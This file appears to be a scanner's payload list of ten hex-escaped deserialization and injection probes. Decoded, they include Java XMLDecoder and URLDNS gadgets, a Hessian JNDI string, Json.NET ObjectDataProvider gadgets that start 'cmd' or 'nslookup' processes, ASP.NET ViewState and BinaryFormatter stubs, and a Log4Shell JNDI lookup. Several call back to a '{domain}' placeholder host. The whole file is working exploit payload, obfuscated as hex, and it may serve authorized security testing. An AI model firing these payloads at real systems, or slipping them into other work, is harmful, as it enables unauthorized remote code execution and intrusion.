\x3c\x6a\x61\x76\x61\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x38\x2e\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x62\x65\x61\x6e\x73\x2e\x58\x4d\x4c\x44\x65\x63\x6f\x64\x65\x72\x22\x3e\x3c\x6f\x62\x6a\x65\x63\x74\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x22\x20\x6d\x65\x74\x68\x6f\x64\x3d\x22\x73\x6c\x65\x65\x70\x22\x3e\x3c\x6c\x6f\x6e\x67\x3e\x35\x30\x30\x30\x3c\x2f\x6c\x6f\x6e\x67\x3e\x3c\x2f\x6f\x62\x6a\x65\x63\x74\x3e\x3c\x2f\x6a\x61\x76\x61\x3e
\x3c\x6a\x61\x76\x61\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x38\x2e\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x62\x65\x61\x6e\x73\x2e\x58\x4d\x4c\x44\x65\x63\x6f\x64\x65\x72\x22\x3e\x3c\x6f\x62\x6a\x65\x63\x74\x20\x63\x6c\x61\x73\x73\x3d\x22\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x22\x3e\x3c\x73\x74\x72\x69\x6e\x67\x3e\x68\x74\x74\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x78\x6d\x6c\x64\x65\x63\x6f\x64\x65\x72\x3c\x2f\x73\x74\x72\x69\x6e\x67\x3e\x3c\x76\x6f\x69\x64\x20\x6d\x65\x74\x68\x6f\x64\x3d\x22\x6f\x70\x65\x6e\x53\x74\x72\x65\x61\x6d\x22\x2f\x3e\x3c\x2f\x6f\x62\x6a\x65\x63\x74\x3e\x3c\x2f\x6a\x61\x76\x61\x3e
\x43\x5f\x68\x65\x73\x73\x69\x61\x6e\x52\x6c\x64\x61\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x61
\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x57\x69\x6e\x64\x6f\x77\x73\x2e\x44\x61\x74\x61\x2e\x4f\x62\x6a\x65\x63\x74\x44\x61\x74\x61\x50\x72\x6f\x76\x69\x64\x65\x72\x2c\x20\x50\x72\x65\x73\x65\x6e\x74\x61\x74\x69\x6f\x6e\x46\x72\x61\x6d\x65\x77\x6f\x72\x6b\x22\x2c\x22\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x22\x3a\x22\x53\x74\x61\x72\x74\x22\x2c\x22\x4f\x62\x6a\x65\x63\x74\x49\x6e\x73\x74\x61\x6e\x63\x65\x22\x3a\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x2c\x20\x53\x79\x73\x74\x65\x6d\x22\x2c\x22\x53\x74\x61\x72\x74\x49\x6e\x66\x6f\x22\x3a\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x53\x74\x61\x72\x74\x49\x6e\x66\x6f\x2c\x20\x53\x79\x73\x74\x65\x6d\x22\x2c\x22\x46\x69\x6c\x65\x4e\x61\x6d\x65\x22\x3a\x22\x6e\x73\x6c\x6f\x6f\x6b\x75\x70\x22\x2c\x22\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x22\x3a\x22\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x22\x7d\x7d\x7d
\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x57\x69\x6e\x64\x6f\x77\x73\x2e\x44\x61\x74\x61\x2e\x4f\x62\x6a\x65\x63\x74\x44\x61\x74\x61\x50\x72\x6f\x76\x69\x64\x65\x72\x2c\x20\x50\x72\x65\x73\x65\x6e\x74\x61\x74\x69\x6f\x6e\x46\x72\x61\x6d\x65\x77\x6f\x72\x6b\x22\x2c\x22\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x22\x3a\x22\x53\x74\x61\x72\x74\x22\x2c\x22\x4f\x62\x6a\x65\x63\x74\x49\x6e\x73\x74\x61\x6e\x63\x65\x22\x3a\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x2c\x20\x53\x79\x73\x74\x65\x6d\x22\x2c\x22\x53\x74\x61\x72\x74\x49\x6e\x66\x6f\x22\x3a\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x53\x74\x61\x72\x74\x49\x6e\x66\x6f\x2c\x20\x53\x79\x73\x74\x65\x6d\x22\x2c\x22\x46\x69\x6c\x65\x4e\x61\x6d\x65\x22\x3a\x22\x63\x6d\x64\x22\x2c\x22\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x22\x3a\x22\x2f\x63\x20\x73\x65\x74\x20\x2f\x61\x20\x37\x2a\x31\x39\x31\x22\x7d\x7d\x7d
\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x57\x69\x6e\x64\x6f\x77\x73\x2e\x44\x61\x74\x61\x2e\x4f\x62\x6a\x65\x63\x74\x44\x61\x74\x61\x50\x72\x6f\x76\x69\x64\x65\x72\x2c\x20\x50\x72\x65\x73\x65\x6e\x74\x61\x74\x69\x6f\x6e\x46\x72\x61\x6d\x65\x77\x6f\x72\x6b\x22\x2c\x22\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x22\x3a\x22\x53\x74\x61\x72\x74\x22\x2c\x22\x4f\x62\x6a\x65\x63\x74\x49\x6e\x73\x74\x61\x6e\x63\x65\x22\x3a\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x2c\x20\x53\x79\x73\x74\x65\x6d\x22\x2c\x22\x53\x74\x61\x72\x74\x49\x6e\x66\x6f\x22\x3a\x7b\x22\x24\x74\x79\x70\x65\x22\x3a\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x53\x74\x61\x72\x74\x49\x6e\x66\x6f\x2c\x20\x53\x79\x73\x74\x65\x6d\x22\x2c\x22\x46\x69\x6c\x65\x4e\x61\x6d\x65\x22\x3a\x22\x63\x6d\x64\x22\x2c\x22\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x22\x3a\x22\x2f\x63\x20\x74\x69\x6d\x65\x6f\x75\x74\x20\x35\x22\x7d\x7d\x7d
\x41\x41\x45\x41\x41\x41\x44\x2f\x2f\x2f\x2f\x2f\x41\x51\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x41\x51\x41\x41\x41\x41\x3d\x3d
\x5f\x5f\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3d\x2f\x77\x45\x50\x44\x77\x55\x4b\x4c\x54\x45\x79\x4d\x7a\x51\x31\x4e\x6a\x63\x34\x4f\x51\x3d\x3d
\x72\x4f\x30\x41\x42\x58\x4e\x79\x41\x42\x46\x71\x59\x58\x5a\x68\x4c\x6e\x56\x30\x61\x57\x77\x75\x53\x47\x46\x7a\x61\x45\x31\x68\x63\x41\x55\x48\x32\x73\x48\x44\x46\x6d\x44\x52\x41\x77\x41\x43\x52\x67\x41\x4b\x62\x47\x39\x68\x5a\x45\x5a\x68\x59\x33\x52\x76\x63\x6b\x6b\x41\x43\x58\x52\x6f\x63\x6d\x56\x7a\x61\x47\x39\x73\x5a\x48\x41\x2f\x51\x41\x41\x41\x41\x41\x41\x41\x44\x48\x63\x49\x41\x41\x41\x41\x45\x41\x41\x41\x41\x41\x46\x7a\x63\x67\x41\x4d\x61\x6d\x46\x32\x59\x53\x35\x75\x5a\x58\x51\x75\x56\x56\x4a\x4d\x6c\x69\x55\x33\x4e\x68\x72\x38\x35\x48\x49\x44\x41\x41\x64\x4a\x41\x41\x68\x6f\x59\x58\x4e\x6f\x51\x32\x39\x6b\x5a\x55\x6b\x41\x42\x48\x42\x76\x63\x6e\x52\x4d\x41\x41\x6c\x68\x64\x58\x52\x6f\x62\x33\x4a\x70\x64\x48\x6c\x30\x41\x42\x4a\x4d\x61\x6d\x46\x32\x59\x53\x39\x73\x59\x57\x35\x6e\x4c\x31\x4e\x30\x63\x6d\x6c\x75\x5a\x7a\x74\x4d\x41\x41\x52\x6d\x61\x57\x78\x6c\x64\x41\x41\x53\x54\x47\x70\x68\x64\x6d\x45\x76\x62\x47\x46\x75\x5a\x79\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x37\x54\x41\x41\x45\x61\x47\x39\x7a\x64\x48\x51\x41\x45\x6b\x78\x71\x59\x58\x5a\x68\x4c\x32\x78\x68\x62\x6d\x63\x76\x55\x33\x52\x79\x61\x57\x35\x6e\x4f\x30\x77\x41\x43\x48\x42\x79\x62\x33\x52\x76\x59\x32\x39\x73\x64\x41\x41\x53\x54\x47\x70\x68\x64\x6d\x45\x76\x62\x47\x46\x75\x5a\x79\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x37\x54\x41\x41\x44\x63\x6d\x56\x6d\x64\x41\x41\x53\x54\x47\x70\x68\x64\x6d\x45\x76\x62\x47\x46\x75\x5a\x79\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x37\x63\x50\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x64\x41\x41\x49\x65\x32\x52\x76\x62\x57\x46\x70\x62\x6e\x31\x30\x41\x41\x63\x76\x64\x58\x4a\x73\x5a\x47\x35\x7a\x64\x41\x41\x49\x65\x32\x52\x76\x62\x57\x46\x70\x62\x6e\x31\x30\x41\x41\x52\x6f\x64\x48\x52\x77\x63\x48\x68\x30\x41\x42\x5a\x6f\x64\x48\x52\x77\x4f\x69\x38\x76\x65\x32\x52\x76\x62\x57\x46\x70\x62\x6e\x30\x76\x64\x58\x4a\x73\x5a\x47\x35\x7a\x65\x41\x3d\x3d
\x24\x7b\x6a\x6e\x64\x69\x3a\x6c\x64\x61\x70\x3a\x2f\x2f\x7b\x64\x6f\x6d\x61\x69\x6e\x7d\x2f\x61\x7d
